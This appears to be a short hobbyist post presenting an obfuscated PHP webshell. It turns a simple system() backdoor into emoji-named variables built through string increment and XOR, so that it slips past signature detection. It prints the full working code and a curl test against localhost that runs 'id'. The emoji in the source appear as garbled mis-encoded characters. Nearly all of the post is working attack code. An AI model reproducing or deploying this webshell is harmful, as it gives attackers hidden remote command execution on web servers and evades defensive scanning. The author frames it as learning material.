๐ฅธ Nothing new about this webshell, just use same techniques like XOR and self increment operations.
Basically this code
<?php
$a = $_REQUEST[4] ? base64_decode($_REQUEST[4]) : 'whoami';
@system($a);Turn into emoji, self increment and XOR operations.
<?php
$_=[]; // $_ = [];
$_=@"$_"; // $_ = "Array";
$__=("_"=="_")+("_"=="_"); // $__ = 1 + 1;
$_=@$_[++$__]; // $_ = $_[3] // "Array"[3]
$๐=$_++; // a
$๐คฎ=$_++; // b
$๐ช=$_++; // c
$๐ซฃ=$_++; // d
$๐ง=$_++; // e
$๐=$_++; // f
$๐ฅ=$_++; // g
$๐=$_++; // h
$๐=$_++; // i
$๐=$_++; // j
$๐=$_++; // k
$๐=$_++; // l
$๐=$_++; // m
$๐=$_++; // n
$๐=$_++; // o
$๐ฐ=$_++; // p
$๐=$_++; // q
$๐ฅ=$_++; // r
$๐ฅฅ=$_++; // s
$๐=$_++; // t
$๐=$_++; // u
$๐ง=$_++; // v
$๐ฎ=$_++; // w
$๐=$_++; // x
$๐ฅฏ=$_++; // y
$๐ฃ=$_; // z
$__++; // 4
$__++; // 5
$__++; // 6
$๐ฟ=$๐คฎ.$๐.$๐ฅฅ.$๐ง.$__; // base6
$__--; // 5
$__--; // 4
$๐ฟ.=$__.("#"^"|").$๐ซฃ.$๐ง.$๐ช.$๐.$๐ซฃ.$๐ง; // base64_decode
$๐=$๐ฅฅ.$๐ฅฏ.$๐ฅฅ.$๐.$๐ง.$๐; // system
$๐ฅณ=("#"^"|").($๐^"#").($๐^"#").($๐ฅ^"#").($๐ง^"#").($๐^"#").($๐ฐ^"#").($๐ฎ^"#"); // _REQUEST
$๐คฏ=@${$๐ฅณ}[$__] ? $๐ฟ(@${$๐ฅณ}[$__]) : $๐ฎ.$๐.$๐.$๐.$๐.$๐; // $_REQUEST[4] ? base64_decode($_REQUEST[4]) : "whoami"
@$๐($๐คฏ); // @system("command")Execute the webshell.
โฏ curl http://127.0.0.1/emoji.php\?4\=`echo id | base64`
uid=501(someone) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),101(access_bpf),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae),701(com.apple.sharepoint.group.1)Im just building this for fun and for the sake of learning new things. โ๏ธ๐ฅฏ